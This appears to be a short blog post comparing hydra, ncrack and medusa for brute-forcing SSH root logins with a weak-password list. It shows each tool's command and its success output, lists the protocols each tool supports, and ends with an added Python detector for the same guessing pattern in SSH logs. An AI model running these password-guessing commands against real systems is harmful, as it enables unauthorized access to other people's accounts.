Brute force passwords with ncrack, hydra, and medusa

# hydra -l root -P 500-worst-passwords.txt ssh

[22][ssh] host: login: root password: toor
[STATUS] attack finished for (waiting for children to finish)


# ncrack -p 22 --user root -P 500-worst-passwords.txt

Discovered credentials for ssh on 22/tcp: 22/tcp ssh: 'root' 'toor'


# medusa -u root -P 500-worst-passwords.txt -h -M ssh

ACCOUNT FOUND: [ssh] Host: User: root Password: toor [SUCCESS]

Problems with VM?

Error: Not an FTP protocol or service shutdown: 500 OOPS: priv_sock_get_cmd

medusaReceive returned no data

The answer is to use ncrack.


Protocols supported include:

Hydra – TELNET, FTP, HTTP, HTTPS, HTTP-PROXY, SMB, SMBNT, MS-SQL, MYSQL, REXEC, irc, RSH, RLOGIN, CVS, SNMP, SMTP, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS, XMPP, ICQ, SAP/R3, LDAP2, LDAP3, Postgres, Teamspeak, Cisco auth, Cisco enable, AFP, Subversion/SVN, Firebird, LDAP2, Cisco AAA

Medusa – AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NetWare NCP, NNTP, PcAnywhere, POP3, PostgreSQL, REXEC, RLOGIN, RSH, SMBNT, SMTP-AUTH, SMTP-VRFY, SNMP, SSHv2, Subversion (SVN), Telnet, VMware Authentication Daemon (vmauthd), VNC, Generic Wrapper, Web Form

Ncrack – RDP, SSH, http(s), SMB, pop3(s), VNC, FTP, telnet

While ncrack has limited protocol support compared to Hydra and Medusa, the only conclusion from this little test is that when it comes to speed, reliability and the ability to hit RDP services, ncrack wins!
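Seen from the target, each SSH run above is a burst of failed root logins from one address followed by a success. The following is an added example, not part of the original post, that flags that pattern in OpenSSH auth-log lines; the log sample, addresses, threshold and window are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in OpenSSH syslog format. The host name "target" and the
# addresses (documentation ranges) are assumptions, not values from the post.
SAMPLE_LOG = "\n".join(
    [f"Mar 13 10:15:0{i} target sshd[210{i}]: Failed password for root "
     f"from 203.0.113.7 port 4011{i} ssh2" for i in range(1, 7)]
    + ["Mar 13 10:15:07 target sshd[2107]: Accepted password for root from 203.0.113.7 port 40117 ssh2",
       "Mar 13 10:20:00 target sshd[2200]: Failed password for alice from 198.51.100.4 port 51000 ssh2",
       "Mar 13 10:20:09 target sshd[2201]: Accepted password for alice from 198.51.100.4 port 51001 ssh2"])

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+")

def detect_guessing(log_text, threshold=5, window=timedelta(seconds=60), year=2024):
    """Flag sources with >= threshold failed logins inside a sliding window,
    and record any login that later succeeds from a flagged source."""
    failures = defaultdict(list)   # source address -> recent failure timestamps
    findings = {}                  # source address -> summary of what was seen
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        # Syslog timestamps carry no year, so one is supplied by the caller.
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        src = m["src"]
        if m["result"] == "Failed":
            recent = [t for t in failures[src] if ts - t <= window] + [ts]
            failures[src] = recent
            if len(recent) >= threshold:
                entry = findings.setdefault(src, {"max_failures": 0, "compromised": []})
                entry["max_failures"] = max(entry["max_failures"], len(recent))
        elif src in findings:
            # Success after a guessing burst: the account should be treated as compromised.
            findings[src]["compromised"].append(m["user"])
    return findings

if __name__ == "__main__":
    for src, info in detect_guessing(SAMPLE_LOG).items():
        print(src, info)
```

The single mistyped password from 198.51.100.4 stays below the threshold and is not reported, while the burst from 203.0.113.7 is reported together with the root login that followed it.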